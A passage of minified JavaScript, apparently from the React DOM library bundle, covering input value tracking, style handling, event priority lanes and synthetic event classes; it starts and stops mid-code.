r=e.stack.split("\n"),o=a.stack.split("\n"),i=r.length-1,l=o.length-1;1<=i&&0<=l&&r[i]!==o[l];)l--;for(;1<=i&&0<=l;i--,l--)if(r[i]!==o[l]){if(1!==i||1!==l)do{if(i--,0>--l||r[i]!==o[l])return"\n"+r[i].replace(" at new "," at ")}while(1<=i&&0<=l);break}}}finally{I=!1,Error.prepareStackTrace=n}return(e=e?e.displayName||e.name:"")?D(e):""}function $(e){switch(e.tag){case 5:return D(e.type);case 16:return D("Lazy");case 13:return D("Suspense");case 19:return D("SuspenseList");case 0:case 2:case 15:return U(e.type,!1);case 11:return U(e.type.render,!1);case 22:return U(e.type._render,!1);case 1:return U(e.type,!0);default:return""}}function G(e){if(null==e)return null;if("function"==typeof e)return e.displayName||e.name||null;if("string"==typeof e)return e;switch(e){case E:return"Fragment";case k:return"Portal";case S:return"Profiler";case C:return"StrictMode";case Z:return"Suspense";case P:return"SuspenseList"}if("object"==typeof e)switch(e.$$typeof){case L:return(e.displayName||"Context")+".Consumer";case M:return(e._context.displayName||"Context")+".Provider";case N:var t=e.render;return t=t.displayName||t.name||"",e.displayName||(""!==t?"ForwardRef("+t+")":"ForwardRef");case z:return G(e.type);case B:return G(e._render);case A:t=e._payload,e=e._init;try{return G(e(t))}catch(e){}}return null}function q(e){switch(typeof e){case"boolean":case"number":case"object":case"string":case"undefined":return e;default:return""}}function K(e){var t=e.type;return(e=e.nodeName)&&"input"===e.toLowerCase()&&("checkbox"===t||"radio"===t)}function X(e){e._valueTracker||(e._valueTracker=function(e){var t=K(e)?"checked":"value",n=Object.getOwnPropertyDescriptor(e.constructor.prototype,t),a=""+e[t];if(!e.hasOwnProperty(t)&&void 0!==n&&"function"==typeof n.get&&"function"==typeof n.set){var r=n.get,o=n.set;return Object.defineProperty(e,t,{configurable:!0,get:function(){return r.call(this)},set:function(e){a=""+e,o.call(this,e)}}),Object.defineProperty(e,t,{enumerable:n.enumerable}),{getValue:function(){return a},setValue:function(e){a=""+e},stopTracking:function(){e._valueTracker=null,delete e[t]}}}}(e))}function Q(e){if(!e)return!1;var t=e._valueTracker;if(!t)return!0;var n=t.getValue(),a="";return e&&(a=K(e)?e.checked?"true":"false":e.value),(e=a)!==n&&(t.setValue(e),!0)}function J(e){if(void 0===(e=e||("undefined"!=typeof document?document:void 0)))return null;try{return e.activeElement||e.body}catch(t){return e.body}}function Y(e,t){var n=t.checked;return r({},t,{defaultChecked:void 0,defaultValue:void 0,value:void 0,checked:null!=n?n:e._wrapperState.initialChecked})}function ee(e,t){var n=null==t.defaultValue?"":t.defaultValue,a=null!=t.checked?t.checked:t.defaultChecked;n=q(null!=t.value?t.value:n),e._wrapperState={initialChecked:a,initialValue:n,controlled:"checkbox"===t.type||"radio"===t.type?null!=t.checked:null!=t.value}}function te(e,t){null!=(t=t.checked)&&b(e,"checked",t,!1)}function ne(e,t){te(e,t);var n=q(t.value),a=t.type;if(null!=n)"number"===a?(0===n&&""===e.value||e.value!=n)&&(e.value=""+n):e.value!==""+n&&(e.value=""+n);else if("submit"===a||"reset"===a)return void e.removeAttribute("value");t.hasOwnProperty("value")?re(e,t.type,n):t.hasOwnProperty("defaultValue")&&re(e,t.type,q(t.defaultValue)),null==t.checked&&null!=t.defaultChecked&&(e.defaultChecked=!!t.defaultChecked)}function ae(e,t,n){if(t.hasOwnProperty("value")||t.hasOwnProperty("defaultValue")){var a=t.type;if(!("submit"!==a&&"reset"!==a||void 0!==t.value&&null!==t.value))return;t=""+e._wrapperState.initialValue,n||t===e.value||(e.value=t),e.defaultValue=t}""!==(n=e.name)&&(e.name=""),e.defaultChecked=!!e._wrapperState.initialChecked,""!==n&&(e.name=n)}function re(e,t,n){"number"===t&&J(e.ownerDocument)===e||(null==n?e.defaultValue=""+e._wrapperState.initialValue:e.defaultValue!==""+n&&(e.defaultValue=""+n))}function oe(e,t){return e=r({children:void 0},t),(t=function(e){var t="";return a.Children.forEach(e,(function(e){null!=e&&(t+=e)})),t}(t.children))&&(e.children=t),e}function ie(e,t,n,a){if(e=e.options,t){t={};for(var r=0;r<n.length;r++)t["$"+n[r]]=!0;for(n=0;n<e.length;n++)r=t.hasOwnProperty("$"+e[n].value),e[n].selected!==r&&(e[n].selected=r),r&&a&&(e[n].defaultSelected=!0)}else{for(n=""+q(n),t=null,r=0;r<e.length;r++){if(e[r].value===n)return e[r].selected=!0,void(a&&(e[r].defaultSelected=!0));null!==t||e[r].disabled||(t=e[r])}null!==t&&(t.selected=!0)}}function le(e,t){if(null!=t.dangerouslySetInnerHTML)throw Error(i(91));return r({},t,{value:void 0,defaultValue:void 0,children:""+e._wrapperState.initialValue})}function se(e,t){var n=t.value;if(null==n){if(n=t.children,t=t.defaultValue,null!=n){if(null!=t)throw Error(i(92));if(Array.isArray(n)){if(!(1>=n.length))throw Error(i(93));n=n[0]}t=n}null==t&&(t=""),n=t}e._wrapperState={initialValue:q(n)}}function pe(e,t){var n=q(t.value),a=q(t.defaultValue);null!=n&&((n=""+n)!==e.value&&(e.value=n),null==t.defaultValue&&e.defaultValue!==n&&(e.defaultValue=n)),null!=a&&(e.defaultValue=""+a)}function ce(e){var t=e.textContent;t===e._wrapperState.initialValue&&""!==t&&null!==t&&(e.value=t)}var de={html:"http://www.w3.org/1999/xhtml",mathml:"http://www.w3.org/1998/Math/MathML",svg:"http://www.w3.org/2000/svg"};function ue(e){switch(e){case"svg":return"http://www.w3.org/2000/svg";case"math":return"http://www.w3.org/1998/Math/MathML";default:return"http://www.w3.org/1999/xhtml"}}function me(e,t){return null==e||"http://www.w3.org/1999/xhtml"===e?ue(t):"http://www.w3.org/2000/svg"===e&&"foreignObject"===t?"http://www.w3.org/1999/xhtml":e}var fe,he,ge=(he=function(e,t){if(e.namespaceURI!==de.svg||"innerHTML"in e)e.innerHTML=t;else{for((fe=fe||document.createElement("div")).innerHTML="<svg>"+t.valueOf().toString()+"</svg>",t=fe.firstChild;e.firstChild;)e.removeChild(e.firstChild);for(;t.firstChild;)e.appendChild(t.firstChild)}},"undefined"!=typeof MSApp&&MSApp.execUnsafeLocalFunction?function(e,t,n,a){MSApp.execUnsafeLocalFunction((function(){return he(e,t)}))}:he);function ve(e,t){if(t){var n=e.firstChild;if(n&&n===e.lastChild&&3===n.nodeType)return void(n.nodeValue=t)}e.textContent=t}var _e={animationIterationCount:!0,borderImageOutset:!0,borderImageSlice:!0,borderImageWidth:!0,boxFlex:!0,boxFlexGroup:!0,boxOrdinalGroup:!0,columnCount:!0,columns:!0,flex:!0,flexGrow:!0,flexPositive:!0,flexShrink:!0,flexNegative:!0,flexOrder:!0,gridArea:!0,gridRow:!0,gridRowEnd:!0,gridRowSpan:!0,gridRowStart:!0,gridColumn:!0,gridColumnEnd:!0,gridColumnSpan:!0,gridColumnStart:!0,fontWeight:!0,lineClamp:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,tabSize:!0,widows:!0,zIndex:!0,zoom:!0,fillOpacity:!0,floodOpacity:!0,stopOpacity:!0,strokeDasharray:!0,strokeDashoffset:!0,strokeMiterlimit:!0,strokeOpacity:!0,strokeWidth:!0},we=["Webkit","ms","Moz","O"];function be(e,t,n){return null==t||"boolean"==typeof t||""===t?"":n||"number"!=typeof t||0===t||_e.hasOwnProperty(e)&&_e[e]?(""+t).trim():t+"px"}function xe(e,t){for(var n in e=e.style,t)if(t.hasOwnProperty(n)){var a=0===n.indexOf("--"),r=be(n,t[n],a);"float"===n&&(n="cssFloat"),a?e.setProperty(n,r):e[n]=r}}Object.keys(_e).forEach((function(e){we.forEach((function(t){t=t+e.charAt(0).toUpperCase()+e.substring(1),_e[t]=_e[e]}))}));var ye=r({menuitem:!0},{area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0});function ke(e,t){if(t){if(ye[e]&&(null!=t.children||null!=t.dangerouslySetInnerHTML))throw Error(i(137,e));if(null!=t.dangerouslySetInnerHTML){if(null!=t.children)throw Error(i(60));if("object"!=typeof t.dangerouslySetInnerHTML||!("__html"in t.dangerouslySetInnerHTML))throw Error(i(61))}if(null!=t.style&&"object"!=typeof t.style)throw Error(i(62))}}function Ee(e,t){if(-1===e.indexOf("-"))return"string"==typeof t.is;switch(e){case"annotation-xml":case"color-profile":case"font-face":case"font-face-src":case"font-face-uri":case"font-face-format":case"font-face-name":case"missing-glyph":return!1;default:return!0}}function Ce(e){return(e=e.target||e.srcElement||window).correspondingUseElement&&(e=e.correspondingUseElement),3===e.nodeType?e.parentNode:e}var Se=null,Me=null,Le=null;function Ne(e){if(e=ar(e)){if("function"!=typeof Se)throw Error(i(280));var t=e.stateNode;t&&(t=or(t),Se(e.stateNode,e.type,t))}}function Ze(e){Me?Le?Le.push(e):Le=[e]:Me=e}function Pe(){if(Me){var e=Me,t=Le;if(Le=Me=null,Ne(e),t)for(e=0;e<t.length;e++)Ne(t[e])}}function ze(e,t){return e(t)}function Ae(e,t,n,a,r){return e(t,n,a,r)}function Be(){}var He=ze,Te=!1,Re=!1;function Oe(){null===Me&&null===Le||(Be(),Pe())}function je(e,t){var n=e.stateNode;if(null===n)return null;var a=or(n);if(null===a)return null;n=a[t];e:switch(t){case"onClick":case"onClickCapture":case"onDoubleClick":case"onDoubleClickCapture":case"onMouseDown":case"onMouseDownCapture":case"onMouseMove":case"onMouseMoveCapture":case"onMouseUp":case"onMouseUpCapture":case"onMouseEnter":(a=!a.disabled)||(a=!("button"===(e=e.type)||"input"===e||"select"===e||"textarea"===e)),e=!a;break e;default:e=!1}if(e)return null;if(n&&"function"!=typeof n)throw Error(i(231,t,typeof n));return n}var Ve=!1;if(d)try{var Fe={};Object.defineProperty(Fe,"passive",{get:function(){Ve=!0}}),window.addEventListener("test",Fe,Fe),window.removeEventListener("test",Fe,Fe)}catch(he){Ve=!1}function We(e,t,n,a,r,o,i,l,s){var p=Array.prototype.slice.call(arguments,3);try{t.apply(n,p)}catch(e){this.onError(e)}}var De=!1,Ie=null,Ue=!1,$e=null,Ge={onError:function(e){De=!0,Ie=e}};function qe(e,t,n,a,r,o,i,l,s){De=!1,Ie=null,We.apply(Ge,arguments)}function Ke(e){var t=e,n=e;if(e.alternate)for(;t.return;)t=t.return;else{e=t;do{0!=(1026&(t=e).flags)&&(n=t.return),e=t.return}while(e)}return 3===t.tag?n:null}function Xe(e){if(13===e.tag){var t=e.memoizedState;if(null===t&&null!==(e=e.alternate)&&(t=e.memoizedState),null!==t)return t.dehydrated}return null}function Qe(e){if(Ke(e)!==e)throw Error(i(188))}function Je(e){if(e=function(e){var t=e.alternate;if(!t){if(null===(t=Ke(e)))throw Error(i(188));return t!==e?null:e}for(var n=e,a=t;;){var r=n.return;if(null===r)break;var o=r.alternate;if(null===o){if(null!==(a=r.return)){n=a;continue}break}if(r.child===o.child){for(o=r.child;o;){if(o===n)return Qe(r),e;if(o===a)return Qe(r),t;o=o.sibling}throw Error(i(188))}if(n.return!==a.return)n=r,a=o;else{for(var l=!1,s=r.child;s;){if(s===n){l=!0,n=r,a=o;break}if(s===a){l=!0,a=r,n=o;break}s=s.sibling}if(!l){for(s=o.child;s;){if(s===n){l=!0,n=o,a=r;break}if(s===a){l=!0,a=o,n=r;break}s=s.sibling}if(!l)throw Error(i(189))}}if(n.alternate!==a)throw Error(i(190))}if(3!==n.tag)throw Error(i(188));return n.stateNode.current===n?e:t}(e),!e)return null;for(var t=e;;){if(5===t.tag||6===t.tag)return t;if(t.child)t.child.return=t,t=t.child;else{if(t===e)break;for(;!t.sibling;){if(!t.return||t.return===e)return null;t=t.return}t.sibling.return=t.return,t=t.sibling}}return null}function Ye(e,t){for(var n=e.alternate;null!==t;){if(t===e||t===n)return!0;t=t.return}return!1}var et,tt,nt,at,rt=!1,ot=[],it=null,lt=null,st=null,pt=new Map,ct=new Map,dt=[],ut="mousedown mouseup touchcancel touchend touchstart auxclick dblclick pointercancel pointerdown pointerup dragend dragstart drop compositionend compositionstart keydown keypress keyup input textInput copy cut paste click change contextmenu reset submit".split(" ");function mt(e,t,n,a,r){return{blockedOn:e,domEventName:t,eventSystemFlags:16|n,nativeEvent:r,targetContainers:[a]}}function ft(e,t){switch(e){case"focusin":case"focusout":it=null;break;case"dragenter":case"dragleave":lt=null;break;case"mouseover":case"mouseout":st=null;break;case"pointerover":case"pointerout":pt.delete(t.pointerId);break;case"gotpointercapture":case"lostpointercapture":ct.delete(t.pointerId)}}function ht(e,t,n,a,r,o){return null===e||e.nativeEvent!==o?(e=mt(t,n,a,r,o),null!==t&&null!==(t=ar(t))&&tt(t),e):(e.eventSystemFlags|=a,t=e.targetContainers,null!==r&&-1===t.indexOf(r)&&t.push(r),e)}function gt(e){var t=nr(e.target);if(null!==t){var n=Ke(t);if(null!==n)if(13===(t=n.tag)){if(null!==(t=Xe(n)))return e.blockedOn=t,void at(e.lanePriority,(function(){o.unstable_runWithPriority(e.priority,(function(){nt(n)}))}))}else if(3===t&&n.stateNode.hydrate)return void(e.blockedOn=3===n.tag?n.stateNode.containerInfo:null)}e.blockedOn=null}function vt(e){if(null!==e.blockedOn)return!1;for(var t=e.targetContainers;0<t.length;){var n=Jt(e.domEventName,e.eventSystemFlags,t[0],e.nativeEvent);if(null!==n)return null!==(t=ar(n))&&tt(t),e.blockedOn=n,!1;t.shift()}return!0}function _t(e,t,n){vt(e)&&n.delete(t)}function wt(){for(rt=!1;0<ot.length;){var e=ot[0];if(null!==e.blockedOn){null!==(e=ar(e.blockedOn))&&et(e);break}for(var t=e.targetContainers;0<t.length;){var n=Jt(e.domEventName,e.eventSystemFlags,t[0],e.nativeEvent);if(null!==n){e.blockedOn=n;break}t.shift()}null===e.blockedOn&&ot.shift()}null!==it&&vt(it)&&(it=null),null!==lt&&vt(lt)&&(lt=null),null!==st&&vt(st)&&(st=null),pt.forEach(_t),ct.forEach(_t)}function bt(e,t){e.blockedOn===t&&(e.blockedOn=null,rt||(rt=!0,o.unstable_scheduleCallback(o.unstable_NormalPriority,wt)))}function xt(e){function t(t){return bt(t,e)}if(0<ot.length){bt(ot[0],e);for(var n=1;n<ot.length;n++){var a=ot[n];a.blockedOn===e&&(a.blockedOn=null)}}for(null!==it&&bt(it,e),null!==lt&&bt(lt,e),null!==st&&bt(st,e),pt.forEach(t),ct.forEach(t),n=0;n<dt.length;n++)(a=dt[n]).blockedOn===e&&(a.blockedOn=null);for(;0<dt.length&&null===(n=dt[0]).blockedOn;)gt(n),null===n.blockedOn&&dt.shift()}function yt(e,t){var n={};return n[e.toLowerCase()]=t.toLowerCase(),n["Webkit"+e]="webkit"+t,n["Moz"+e]="moz"+t,n}var kt={animationend:yt("Animation","AnimationEnd"),animationiteration:yt("Animation","AnimationIteration"),animationstart:yt("Animation","AnimationStart"),transitionend:yt("Transition","TransitionEnd")},Et={},Ct={};function St(e){if(Et[e])return Et[e];if(!kt[e])return e;var t,n=kt[e];for(t in n)if(n.hasOwnProperty(t)&&t in Ct)return Et[e]=n[t];return e}d&&(Ct=document.createElement("div").style,"AnimationEvent"in window||(delete kt.animationend.animation,delete kt.animationiteration.animation,delete kt.animationstart.animation),"TransitionEvent"in window||delete kt.transitionend.transition);var Mt=St("animationend"),Lt=St("animationiteration"),Nt=St("animationstart"),Zt=St("transitionend"),Pt=new Map,zt=new Map,At=["abort","abort",Mt,"animationEnd",Lt,"animationIteration",Nt,"animationStart","canplay","canPlay","canplaythrough","canPlayThrough","durationchange","durationChange","emptied","emptied","encrypted","encrypted","ended","ended","error","error","gotpointercapture","gotPointerCapture","load","load","loadeddata","loadedData","loadedmetadata","loadedMetadata","loadstart","loadStart","lostpointercapture","lostPointerCapture","playing","playing","progress","progress","seeking","seeking","stalled","stalled","suspend","suspend","timeupdate","timeUpdate",Zt,"transitionEnd","waiting","waiting"];function Bt(e,t){for(var n=0;n<e.length;n+=2){var a=e[n],r=e[n+1];r="on"+(r[0].toUpperCase()+r.slice(1)),zt.set(a,t),Pt.set(a,r),p(r,[a])}}(0,o.unstable_now)();var Ht=8;function Tt(e){if(0!=(1&e))return Ht=15,1;if(0!=(2&e))return Ht=14,2;if(0!=(4&e))return Ht=13,4;var t=24&e;return 0!==t?(Ht=12,t):0!=(32&e)?(Ht=11,32):0!=(t=192&e)?(Ht=10,t):0!=(256&e)?(Ht=9,256):0!=(t=3584&e)?(Ht=8,t):0!=(4096&e)?(Ht=7,4096):0!=(t=4186112&e)?(Ht=6,t):0!=(t=62914560&e)?(Ht=5,t):67108864&e?(Ht=4,67108864):0!=(134217728&e)?(Ht=3,134217728):0!=(t=805306368&e)?(Ht=2,t):0!=(1073741824&e)?(Ht=1,1073741824):(Ht=8,e)}function Rt(e,t){var n=e.pendingLanes;if(0===n)return Ht=0;var a=0,r=0,o=e.expiredLanes,i=e.suspendedLanes,l=e.pingedLanes;if(0!==o)a=o,r=Ht=15;else if(0!=(o=134217727&n)){var s=o&~i;0!==s?(a=Tt(s),r=Ht):0!=(l&=o)&&(a=Tt(l),r=Ht)}else 0!=(o=n&~i)?(a=Tt(o),r=Ht):0!==l&&(a=Tt(l),r=Ht);if(0===a)return 0;if(a=n&((0>(a=31-Dt(a))?0:1<<a)<<1)-1,0!==t&&t!==a&&0==(t&i)){if(Tt(t),r<=Ht)return t;Ht=r}if(0!==(t=e.entangledLanes))for(e=e.entanglements,t&=a;0<t;)r=1<<(n=31-Dt(t)),a|=e[n],t&=~r;return a}function Ot(e){return 0!=(e=-1073741825&e.pendingLanes)?e:1073741824&e?1073741824:0}function jt(e,t){switch(e){case 15:return 1;case 14:return 2;case 12:return 0===(e=Vt(24&~t))?jt(10,t):e;case 10:return 0===(e=Vt(192&~t))?jt(8,t):e;case 8:return 0===(e=Vt(3584&~t))&&0===(e=Vt(4186112&~t))&&(e=512),e;case 2:return 0===(t=Vt(805306368&~t))&&(t=268435456),t}throw Error(i(358,e))}function Vt(e){return e&-e}function Ft(e){for(var t=[],n=0;31>n;n++)t.push(e);return t}function Wt(e,t,n){e.pendingLanes|=t;var a=t-1;e.suspendedLanes&=a,e.pingedLanes&=a,(e=e.eventTimes)[t=31-Dt(t)]=n}var Dt=Math.clz32?Math.clz32:function(e){return 0===e?32:31-(It(e)/Ut|0)|0},It=Math.log,Ut=Math.LN2,$t=o.unstable_UserBlockingPriority,Gt=o.unstable_runWithPriority,qt=!0;function Kt(e,t,n,a){Te||Be();var r=Qt,o=Te;Te=!0;try{Ae(r,e,t,n,a)}finally{(Te=o)||Oe()}}function Xt(e,t,n,a){Gt($t,Qt.bind(null,e,t,n,a))}function Qt(e,t,n,a){var r;if(qt)if((r=0==(4&t))&&0<ot.length&&-1<ut.indexOf(e))e=mt(null,e,t,n,a),ot.push(e);else{var o=Jt(e,t,n,a);if(null===o)r&&ft(e,a);else{if(r){if(-1<ut.indexOf(e))return e=mt(o,e,t,n,a),void ot.push(e);if(function(e,t,n,a,r){switch(t){case"focusin":return it=ht(it,e,t,n,a,r),!0;case"dragenter":return lt=ht(lt,e,t,n,a,r),!0;case"mouseover":return st=ht(st,e,t,n,a,r),!0;case"pointerover":var o=r.pointerId;return pt.set(o,ht(pt.get(o)||null,e,t,n,a,r)),!0;case"gotpointercapture":return o=r.pointerId,ct.set(o,ht(ct.get(o)||null,e,t,n,a,r)),!0}return!1}(o,e,t,n,a))return;ft(e,a)}Ha(e,t,a,null,n)}}}function Jt(e,t,n,a){var r=Ce(a);if(null!==(r=nr(r))){var o=Ke(r);if(null===o)r=null;else{var i=o.tag;if(13===i){if(null!==(r=Xe(o)))return r;r=null}else if(3===i){if(o.stateNode.hydrate)return 3===o.tag?o.stateNode.containerInfo:null;r=null}else o!==r&&(r=null)}}return Ha(e,t,a,r,n),null}var Yt=null,en=null,tn=null;function nn(){if(tn)return tn;var e,t,n=en,a=n.length,r="value"in Yt?Yt.value:Yt.textContent,o=r.length;for(e=0;e<a&&n[e]===r[e];e++);var i=a-e;for(t=1;t<=i&&n[a-t]===r[o-t];t++);return tn=r.slice(e,1<t?1-t:void 0)}function an(e){var t=e.keyCode;return"charCode"in e?0===(e=e.charCode)&&13===t&&(e=13):e=t,10===e&&(e=13),32<=e||13===e?e:0}function rn(){return!0}function on(){return!1}function ln(e){function t(t,n,a,r,o){for(var i in this._reactName=t,this._targetInst=a,this.type=n,this.nativeEvent=r,this.target=o,this.currentTarget=null,e)e.hasOwnProperty(i)&&(t=e[i],this[i]=t?t(r):r[i]);return this.isDefaultPrevented=(null!=r.defaultPrevented?r.defaultPrevented:!1===r.returnValue)?rn:on,this.isPropagationStopped=on,this}return r(t.prototype,{preventDefault:function(){this.defaultPrevented=!0;var e=this.nativeEvent;e&&(e.preventDefault?e.preventDefault():"unknown"!=typeof e.returnValue&&(e.returnValue=!1),this.isDefaultPrevented=rn)},stopPropagation:function(){var e=this.nativeEvent;e&&(e.stopPropagation?e.stopPropagation():"unknown"!=typeof e.cancelBubble&&(e.cancelBubble=!0),this.isPropagationStopped=rn)},persist:function(){},isPersistent:rn}),t}var sn,pn,cn,dn={eventPhase:0,bubbles:0,cancelable:0,timeStamp:function(e){return e.timeStamp||Date.now()},defaultPrevented:0,isTrusted:0},un=ln(dn),mn=r({},dn,{view:0,detail:0}),fn=ln(mn),hn=r({},mn,{screenX:0,screenY:0,clientX:0,clientY:0,pageX:0,pageY:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,getModifierState:Ln,button:0,buttons:0,relatedTarget:function(e){return void 0===e.relatedTarget?e.fromElement===e.srcElement?e.toElement:e.fromElement:e.relatedTarget},movementX:function(e){return"movementX"in e?e.movementX:(e!==cn&&(cn&&"mousemove"===e.type?(sn=e.screenX-cn.screenX,pn=e.screenY-cn.screenY):pn=sn=0,cn=e),sn)},movementY:function(e){return"movementY"in e?e.movementY:pn}}),gn=ln(hn),vn=ln(r({},hn,{dataTransfer:0})),wn=ln(r({},mn,{relatedTarget:0})),bn=ln(r({},dn,{animationName:0,elapsedTime:0,pseudoElement:0})),xn=r({},dn,{clipboardData:function(e){return"clipboardData"in e?e.clipboardData:window.clipboardData}}),yn=ln(xn),kn=ln(r({},dn,{data:0})),En={Esc:"Escape",Spacebar:" ",Left:"ArrowLeft",Up:"ArrowUp",Right:"ArrowRight",Down:"ArrowDown",Del:"Delete",Win:"OS",Menu:"ContextMenu",Apps:"ContextMenu",Scroll:"ScrollLock",MozPrintableKey:"Unidentified"},Cn={8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",45:"Insert",46:"Delete",112:"F1",113:"F2",114:"F3",115:"F4",116:"F5",117:"F6",118:"F7",119:"F8",120:"F9",121:"F10",122:"F11",123:"F12",144:"NumLock",145:"ScrollLock",224:"Meta"},Sn={Alt:"altKey",Control:"ctrlKey",Meta:"metaKey",Shift:"shiftKey"};function Mn(e){var t=this.nativeEvent;return t.getModifierState?t.getModifierState(e):!!(e=Sn[e])&&!!t[e]}function Ln(){return Mn}var Nn=r({},mn,{key:function(e){if(e.key){var t=En[e.key]||e.key;if("Unidentified"!==t)return t}return"keypress"===e.type?13===(e=an(e))?"Enter":String.fromCharCode(e):"keydown"===e.type||"keyup"===e.type?Cn[e.keyCode]||"Unidentified":""},code:0,location:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,repeat:0,locale:0,getModifierState:Ln,charCode:function(e){return"keypress"===e.type?an(e):0},keyCode:function(e){return"keydown"===e.type||"keyup"===e.type?e.keyCode:0},which:function(e){return"keypress"===e.type?an(e):"keydown"===e.type||"keyup"===e.type?e.keyCode:0}}),Zn=ln(Nn),Pn=ln(r({},hn,{pointerId:0,width:0,height:0,pressure:0,tangentialPressure:0,tiltX:0,tiltY:0,twist:0,pointerType:0,isPrimary:0})),zn=ln(r({},mn,{touches:0,targetTouches:0,changedTouches:0,altKey:0,metaKey:0,ctrlKey:0,shiftKey:0,getModifierState:Ln})),An=ln(r({},dn,{propertyName:0,elapsedTime:0,pseudoElement:0})),Bn=r({},hn,{deltaX:function(e){return"deltaX"in e?e.deltaX:"wheelDeltaX"in e?-e.wheelDeltaX:0},deltaY:function(e){return"deltaY"in e?e.deltaY:"wheelDeltaY"in e?-e.wheelDeltaY:"wheelDelta"in e?-e.wheelDelta:0},deltaZ:0,deltaMode:0}),Hn=ln(Bn),Tn=[9,13,27,32],Rn=d&&"CompositionEvent"in window,On=null;d&&"documentMode"in document&&(On=document.documentMode);var jn=d&&"TextEvent"in window&&!On,Vn=d&&(!Rn||On&&8<On&&11>=On),Fn=String.fromCharCode(32),Wn=!1;function Dn(e,t){switch(e){case"keyup":return-1!==Tn.indexOf(t.keyCode);case"keydown":return 229!==t.keyCode;case"keypress":case"mousedown":case"focusout":return!0;default:return!1}}function In(e){return"object"==typeof(e=e.detail)&&"data"in e?e.data:null}var Un=!1,$n={color:!0,date:!0,datetime:!0,"datetime-local":!0,email:!0,month:!0,number:!0,password:!0,range:!0,search:!0,tel:!0,text:!0,time:!0,url:!0,week:!0};function Gn(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return"input"===t?!!$n[e.type]:"textarea"===t}function qn(e,t,n,a){Ze(a),0<(t=Ra(t,"onChange")).length&&(n=new un("onChange","change",null,n,a),e.push({event:n,listeners:t}))}var Kn=null,Xn=null;function Qn(e){Na(e,0)}function Jn(e){if(Q(rr(e)))return e}function Yn(e,t){if("change"===e)return t}var ea=!1;if(d){var ta;if(d){var na="oninput"in document;if(!na){var aa=document.createElement("div");aa.setAttribute("oninput","return;"),na="function"==typeof aa.oninput}ta=na}else ta=!1;ea=ta&&(!document.documentMode||9<document.documentMode)}function ra(){Kn&&(Kn.detachEvent("onpropertychange",oa),Xn=Kn=null)}function oa(e){if("value"===e.propertyName&&Jn(Xn)){var t=[];if(qn(t,Xn,e,Ce(e)),e=Qn,Te)e(t);else{Te=!0;try{ze(e,t)}finally{Te=!1,Oe()}}}}function ia(e,t,n){"focusin"===e?(ra(),Xn=n,(Kn=t).attachEvent("onpropertychange",oa)):"focusout"===e&&ra()}function la(e){if("selectionchange"===e||"keyup"===e||"keydown"===e)return Jn(Xn)}function sa(e,t){if("click"===e)return Jn(t)}function pa(e,t){if("input"===e||"change"===e)return Jn(t)}var ca="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},da=Object.prototype.hasOwnProperty;function ua(e,t){if(ca(e,t))return!0;if("object"!=typeof e||null===e||"object"!=typeof t||null===t)return!1;var n=Object.keys(e),a=Object.keys(t);if(n.length!==a.length)return!1;for(a=0;a<n.length;a++)if(!da.call(t,n[a])||!ca(e[n[a]],t[n[a]]))return!1;return!0}function ma(e){for(;e&&e.firstChild;)e=e.firstChild;return e}function fa(e,t){var n,a=ma(e);for(e=0;a;){if(3===a.nodeType){if(n=e+a.textContent.length,e<=t&&n>=t)return{node:a,offset:t-e};e=n}e:{for(;a;){if(a.nextSibling){a=a.nextSibling;break e}a=a.parentNode}a=void 0}a=ma(a)}}function ha(e,t){return!(!e||!t)&&(e===t||(!e||3!==e.nodeType)&&(t&&3===t.nodeType?ha(e,t.parentNode):"contains"in e?e.contains(t):!!e.compareDocumentPosition&&!!(16&e.compareDocumentPosition(t))))}function ga(){for(var e=window,t=J();t instanceof e.HTMLIFrameElement;){try{var n="string"==typeof t.contentWindow.location.href}catch(e){n=!1}if(!n)break;t=J((e=t.contentWindow).document)}return t}function va(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return t&&("input"===t&&("text"===e.type||"search"===e.type||"tel"===e.type||"url"===e.type||"password"===e.type)||"textarea"===t||"true"===e.contentEditable)}var _a=d&&"documentMode"in document&&11>=document.documentMode,wa=null,ba=null,xa=null,ya=!1;function ka(e,t,n){var a=n.window===n?n.document:9===n.nodeType?n:n.ownerDocument;ya||null==wa||wa!==J(a)||(a="selectionStart"in(a=wa)&&va(a)?{start:a.selectionStart,end:a.selectionEnd}:{anchorNode:(a=(a.ownerDocument&&a.ownerDocument.defaultView||window).getSelection()).anchorNode,anchorOffset:a.anchorOffset,focusNode:a.focusNode,focusOffset:a.focusOffset},xa&&ua(xa,a)||(xa=a,0<(a=Ra(ba,"onSelect")).length&&(t=new un("onSelect","select",null,t,n),e.push({event:t,listeners:a}),t.target=wa)))}Bt("cancel cancel click click close close contextmenu contextMenu copy copy cut cut auxclick auxClick dblclick doubleClick dragend dragEnd dragstart dragStart drop drop focusin focus focusout blur input input invalid invalid keydown keyDown keypress keyPress keyup keyUp mousedown mouseDown mouseup mouseUp paste paste pause pause play play pointercancel pointerCancel pointerdown pointerDown pointerup pointerUp ratechange rateChange reset reset seeked seeked submit submit touchcancel touchCancel touchend touchEnd touchstart touchStart volumechange volumeChange".split(" "),0),Bt("drag drag dragenter dragEnter dragexit dragExit dragleave dragLeave dragover dragOver mousemove mouseMove mouseout mouseOut mouseover mouseOver pointermove pointerMove pointerout pointerOut pointerover pointerOver scroll scroll toggle toggle touchmove touchMove wheel wheel".split(" "),1),Bt(At,2);for(var Ea="change selectionchange textInput compositionstart compositionend compositionupdate".split(" "),Ca=0;Ca<Ea.length;Ca++)zt.set(Ea[Ca],0);c("onMouseEnter",["mouseout","mouseover"]),c("onMouseLeave",["mouseout","mouseover"]),c("onPointerEnter",["pointerout","pointerover"]),c("onPointerLeave",["pointerout","pointerover"]),p("onChange","change click focusin focusout input keydown keyup selectionchange".split(" ")),p("onSelect","focusout contextmenu dragend focusin keydown keyup mousedown mouseup selectionchange".split(" 